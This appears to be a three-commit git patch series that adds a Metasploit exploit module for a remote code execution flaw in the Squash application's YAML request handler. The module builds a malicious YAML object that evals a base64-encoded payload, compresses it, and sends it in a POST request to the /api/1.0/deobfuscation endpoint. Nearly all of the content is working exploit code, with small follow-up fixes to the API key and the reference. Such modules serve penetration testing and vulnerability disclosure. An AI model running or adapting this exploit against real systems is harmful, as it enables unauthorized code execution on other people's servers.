From 69a86b60e2d79310879c1ee38771071380bd8fae Mon Sep 17 00:00:00 2001
From: root <root@localhost.localdomain>
Date: Tue, 6 Aug 2013 14:00:17 -0400
Subject: [PATCH 1/3] Added initial squash RCE exploit

---
 .../exploits/unix/webapp/squash_yaml_exec.rb  | 63 +++++++++++++++++++
 1 file changed, 63 insertions(+)
 create mode 100644 modules/exploits/unix/webapp/squash_yaml_exec.rb

diff --git a/modules/exploits/unix/webapp/squash_yaml_exec.rb b/modules/exploits/unix/webapp/squash_yaml_exec.rb
new file mode 100644
index 0000000000..ada7585310
--- /dev/null
+++ b/modules/exploits/unix/webapp/squash_yaml_exec.rb
@@ -0,0 +1,63 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# web site for more information on licensing and terms of use.
+#   http://metasploit.com/
+##
+
+require 'msf/core'
+require 'zlib'
+require 'base64'
+
+class Metasploit3 < Msf::Exploit::Remote
+	Rank = ExcellentRanking
+
+	include Msf::Exploit::Remote::HttpClient
+
+	def initialize(info = {})
+		super(update_info(info,
+			'Name'           => 'Squash YAML Code Exec',
+			'Description'    => %q{
+					This module exploits a remote code execution vulnerability in the
+				YAML request processor of the Squash application.
+			},
+			'Author'         =>
+				[
+					'Charlie Eriksen', # Discovery, initial exploit
+				],
+			'License'        => MSF_LICENSE,
+			'References'     =>
+				[
+					['CVE', '2013-XXXX'], # Waiting for CVE
+				],
+			'Platform'       => 'ruby',
+			'Arch'           => ARCH_RUBY,
+			'Privileged'     => false,
+			'Targets'        =>	[ ['Automatic', {} ] ],
+			'DisclosureDate' => 'Aug 06 2013',
+			'DefaultTarget'  => 0))
+
+		register_options(
+			[
+				Opt::RPORT(80),
+				OptString.new('TARGETURI', [ true, 'The path to a vulnerable Ruby on Rails application', "/"]),
+			], self.class)
+
+	end
+
+
+	def exploit
+		code = Rex::Text.encode_base64(payload.encoded)
+		yaml =	"--- !ruby/hash:ActionDispatch::Routing::RouteSet::NamedRouteCollection\n" +
+			"'#{Rex::Text.rand_text_alpha(rand(8)+1)};eval(%[#{code}].unpack(%[m0])[0]);' " +
+			": !ruby/object:OpenStruct\n table:\n  :defaults: {}\n"
+		payload = Base64.encode64(Zlib::Deflate.deflate(yaml)).gsub("\n", "")
+		data = "{\"api_key\":\"#{datastore['APIKEY']}\",\"environment\":\"production\",\"build\":\"1\",\"namespace\":\"#{payload}\"}"
+		send_request_cgi({
+			'uri'     => '/api/1.0/deobfuscation',
+			'method'  => 'POST',
+			'ctype'   => 'application/json',
+			'data'    => data
+		}, 30)
+	end
+end

From cfd5f292207eee6bcd7f49e716c868c91f12674e Mon Sep 17 00:00:00 2001
From: root <root@localhost.localdomain>
Date: Tue, 6 Aug 2013 14:10:48 -0400
Subject: [PATCH 2/3] Fixing the use of APIKEY, which is not needed

---
 modules/exploits/unix/webapp/squash_yaml_exec.rb | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/modules/exploits/unix/webapp/squash_yaml_exec.rb b/modules/exploits/unix/webapp/squash_yaml_exec.rb
index ada7585310..73c39cc41d 100644
--- a/modules/exploits/unix/webapp/squash_yaml_exec.rb
+++ b/modules/exploits/unix/webapp/squash_yaml_exec.rb
@@ -52,7 +52,7 @@ class Metasploit3 < Msf::Exploit::Remote
 			"'#{Rex::Text.rand_text_alpha(rand(8)+1)};eval(%[#{code}].unpack(%[m0])[0]);' " +
 			": !ruby/object:OpenStruct\n table:\n  :defaults: {}\n"
 		payload = Base64.encode64(Zlib::Deflate.deflate(yaml)).gsub("\n", "")
-		data = "{\"api_key\":\"#{datastore['APIKEY']}\",\"environment\":\"production\",\"build\":\"1\",\"namespace\":\"#{payload}\"}"
+		data = "{\"api_key\":\"1\",\"environment\":\"production\",\"build\":\"1\",\"namespace\":\"#{payload}\"}"
 		send_request_cgi({
 			'uri'     => '/api/1.0/deobfuscation',
 			'method'  => 'POST',

From a745ec8fa6b9a1f6d7c1f3c4a5f8a20f735cb306 Mon Sep 17 00:00:00 2001
From: root <root@localhost.localdomain>
Date: Tue, 6 Aug 2013 14:43:25 -0400
Subject: [PATCH 3/3] Adding reference

---
 modules/exploits/unix/webapp/squash_yaml_exec.rb | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/modules/exploits/unix/webapp/squash_yaml_exec.rb b/modules/exploits/unix/webapp/squash_yaml_exec.rb
index 73c39cc41d..97df122706 100644
--- a/modules/exploits/unix/webapp/squash_yaml_exec.rb
+++ b/modules/exploits/unix/webapp/squash_yaml_exec.rb
@@ -28,7 +28,7 @@ class Metasploit3 < Msf::Exploit::Remote
 			'License'        => MSF_LICENSE,
 			'References'     =>
 				[
-					['CVE', '2013-XXXX'], # Waiting for CVE
+					[ 'URL', 'http://ceriksen.com/2013/08/06/squash-remote-code-execution-vulnerability-advisory/'],
 				],
 			'Platform'       => 'ruby',
 			'Arch'           => ARCH_RUBY,